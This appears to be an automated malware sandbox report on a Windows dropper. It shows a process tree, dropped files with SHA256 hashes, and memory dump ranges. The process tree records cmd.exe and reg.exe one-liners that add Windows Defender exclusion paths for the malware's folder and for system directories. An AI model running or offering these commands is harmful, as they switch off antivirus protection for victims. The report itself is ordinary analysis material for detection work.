                                                        • Windows security bypass
                                                        PID:3532
                                                    • C:\Program Files (x86)\0rny3z\66177.exe
                                                      "C:\Program Files (x86)\0rny3z\66177.exe"
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4788
                                                    • C:\Program Files (x86)\atg70R\atg70R.exe
                                                      "C:\Program Files (x86)\atg70R\atg70R.exe"
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:4024
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\atg70R" /t REG_DWORD /d 0 /f
                                                      1⤵
                                                      • Executes a command shell one-liner
                                                      PID:604
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\atg70R" /t REG_DWORD /d 0 /f
                                                        2⤵
                                                          PID:2236
                                                      • C:\Program Files (x86)\atg70R\atg70R.exe
                                                        "C:\Program Files (x86)\atg70R\atg70R.exe"
                                                        1⤵
                                                          PID:3132
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                          1⤵
                                                          • Executes a command shell one-liner
                                                          PID:3172
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                            2⤵
                                                              PID:4800
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                            1⤵
                                                            • Executes a command shell one-liner
                                                            PID:4292

                                                          Network

                                                                MITRE ATT&CK Enterprise v16

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                e588808.rbs

                                                                • Path C:\Config.Msi\e588808.rbs
                                                                • Size 7KB
                                                                • SHA256 f2d8370db6aeb2c7b5f7ca3f331d6669c3457fde8fe97cc30558115b16063230
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                XPSPLOG.dll

                                                                • Path C:\Program Files (x86)\0rny3z\XPSPLOG.dll
                                                                • Size 4.6MB
                                                                • SHA256 dd287df9bd75a0413746e64d23a82564b1577152940adf25e89ffec1252b260c
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                image.png

                                                                • Path C:\Program Files (x86)\0rny3z\image.png
                                                                • Size 4.9MB
                                                                • SHA256 146a219e01073f1d5435df82f46ddd82e5e278b6dd6eaa6bf91f58aef6dda412
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                XPSPLOG.dll

                                                                • Path C:\Program Files (x86)\atg70R\XPSPLOG.dll
                                                                • Size 4.6MB
                                                                • SHA256 83197fffa72290ea411602e81357d11f1bb56d62198d92f53c7186f5dacb0faf
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                atg70R.exe

                                                                • Path C:\Program Files (x86)\atg70R\atg70R.exe
                                                                • Size 145KB
                                                                • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                image.png

                                                                • Path C:\Program Files (x86)\atg70R\image.png
                                                                • Size 4.9MB
                                                                • SHA256 565a229e2663321069eeaab2476fd64423684062d5f5b3bfbf33bab61bc859fa
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                thumbs.db

                                                                • Path C:\Program Files (x86)\atg70R\thumbs.db
                                                                • Size 358KB
                                                                • SHA256 63e34246ed08cb5be1ea3be302da53854c108277f1aa46fe6c75d9d5006ba99d
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                destopbak.ini

                                                                • Path C:\Users\Public\Music\destopbak.ini
                                                                • Size 2B
                                                                • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                                                • MD5 SHA1 SHA512

                                                                UxEnhance64.dll

                                                                • Path C:\Users\Public\a2TlTw\UxEnhance64.dll
                                                                • Size 3.1MB
                                                                • SHA256 6ddc775a0f6fcc2c577998d77089c09dc22de35ff341ddac7a071a9d9c0144be
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                adoresd.dat

                                                                • Path C:\Users\Public\a2TlTw\adoresd.dat
                                                                • Size 4.8MB
                                                                • SHA256 fb620186613beafc03d6b7cfb530315b7972fbbd8c8d0a6da790b179a6cb859d
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                i0f4mZ.exe

                                                                • Path C:\Users\Public\a2TlTw\i0f4mZ.exe
                                                                • Size 135KB
                                                                • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                msadox.tb

                                                                • Path C:\Users\Public\a2TlTw\msadox.tb
                                                                • Size 8KB
                                                                • SHA256 94bd1c380dfa5096582dfafb8ae32f06cc0f66169e59f5eff4633dd990138422
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                MSI8941.tmp

                                                                • Path C:\Windows\Installer\MSI8941.tmp
                                                                • Size 5.8MB
                                                                • SHA256 d9a82faff6c4babb4525dd27b78cf57c8a597596145527fadc096461f2d485f3
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                e588807.msi

                                                                • Path C:\Windows\Installer\e588807.msi
                                                                • Size 5.9MB
                                                                • SHA256 2dcc9972c15355c326b128771d83a6ccd03ec64af7a690f40373402db2393d82
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                metadata-2

                                                                • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                                • Size 24.1MB
                                                                • SHA256 e4e4c4c134da2dc347399ce22221686cbcfe2f9a0fe5e35522cee92c1249a7e8
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                {a796f30d-6f53-4938-a202-c5c74783747b}_OnDiskSnapshotProp

                                                                • Path \??\Volume{0dfc9b49-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{a796f30d-6f53-4938-a202-c5c74783747b}_OnDiskSnapshotProp
                                                                • Size 6KB
                                                                • SHA256 cea934c2cd5ab90028a5b3aad33deddf83c686138af973ae626bccee02a9ff69
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                xxxx.ini

                                                                • Path \??\c:\xxxx.ini
                                                                • Size 2B
                                                                • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                                                • MD5 SHA1 SHA512

                                                                memory/3132-246-0x0000000074730000-0x0000000074E7A000-memory.dmp

                                                                memory/3132-249-0x0000000002F20000-0x0000000003709000-memory.dmp

                                                                memory/3132-245-0x0000000000810000-0x0000000000811000-memory.dmp

                                                                memory/3132-257-0x0000000002F20000-0x0000000003709000-memory.dmp

                                                                memory/3132-256-0x0000000000830000-0x0000000000831000-memory.dmp

                                                                memory/3132-260-0x0000000000810000-0x0000000000811000-memory.dmp

                                                                memory/3592-71-0x000002B8198F0000-0x000002B81A1AE000-memory.dmp

                                                                memory/3592-70-0x000002B8198F0000-0x000002B81A1AE000-memory.dmp

                                                                memory/3592-83-0x000002B81A580000-0x000002B81A60A000-memory.dmp

                                                                memory/3592-82-0x000002B81A580000-0x000002B81A60A000-memory.dmp

                                                                memory/3592-81-0x000002B817720000-0x000002B81776E000-memory.dmp

                                                                memory/3592-90-0x000002B8198F0000-0x000002B81A1AE000-memory.dmp

                                                                memory/3592-91-0x000002B8198F0000-0x000002B81A1AE000-memory.dmp

                                                                memory/3592-85-0x000002B81A580000-0x000002B81A60A000-memory.dmp

                                                                memory/3592-76-0x000002B8198F0000-0x000002B81A1AE000-memory.dmp

                                                                memory/3592-84-0x000002B81A580000-0x000002B81A60A000-memory.dmp

                                                                memory/3592-72-0x000002B8198F0000-0x000002B81A1AE000-memory.dmp

                                                                memory/3592-69-0x000002B8198F0000-0x000002B81A1AE000-memory.dmp

                                                                memory/3592-65-0x000002B8198F0000-0x000002B81A1AE000-memory.dmp

                                                                memory/3592-57-0x00007FFAC24D0000-0x00007FFAC29EE000-memory.dmp

                                                                memory/3592-64-0x00007FFAE0D60000-0x00007FFAE0D62000-memory.dmp

                                                                memory/3592-56-0x00007FFAE0D50000-0x00007FFAE0D52000-memory.dmp

                                                                memory/3592-62-0x000002B8198F0000-0x000002B81A1AE000-memory.dmp

                                                                memory/4060-181-0x00000000010E0000-0x00000000010E1000-memory.dmp

                                                                memory/4060-193-0x0000000003CF0000-0x0000000003D04000-memory.dmp

                                                                memory/4060-179-0x0000000003480000-0x0000000003C69000-memory.dmp

                                                                memory/4060-202-0x0000000010000000-0x0000000010061000-memory.dmp

                                                                memory/4060-211-0x0000000003480000-0x0000000003C69000-memory.dmp

                                                                memory/4060-221-0x0000000003480000-0x0000000003C69000-memory.dmp

                                                                memory/4060-183-0x0000000003480000-0x0000000003C69000-memory.dmp

                                                                memory/4060-175-0x0000000074730000-0x0000000074E7A000-memory.dmp

                                                                memory/4060-186-0x0000000003480000-0x0000000003C69000-memory.dmp

                                                                memory/4060-194-0x0000000003480000-0x0000000003C69000-memory.dmp

                                                                memory/4060-174-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

                                                                memory/4524-12-0x00007FFAE0D50000-0x00007FFAE0D52000-memory.dmp

                                                                memory/4524-42-0x00007FFAD1EE0000-0x00007FFAD1EF0000-memory.dmp

                                                                memory/4524-13-0x00007FFAC2490000-0x00007FFAC2AC8000-memory.dmp

                                                                memory/4524-16-0x00007FFAD1EE0000-0x00007FFAD1EF0000-memory.dmp

                                                                memory/4788-238-0x00000000011D0000-0x00000000011D1000-memory.dmp

                                                                memory/4788-251-0x0000000001630000-0x0000000001631000-memory.dmp

                                                                memory/4788-255-0x00000000011D0000-0x00000000011D1000-memory.dmp

                                                                memory/4788-252-0x0000000003810000-0x0000000003FF9000-memory.dmp

                                                                memory/4788-243-0x0000000003810000-0x0000000003FF9000-memory.dmp

                                                                memory/4788-239-0x0000000072450000-0x0000000072B9A000-memory.dmp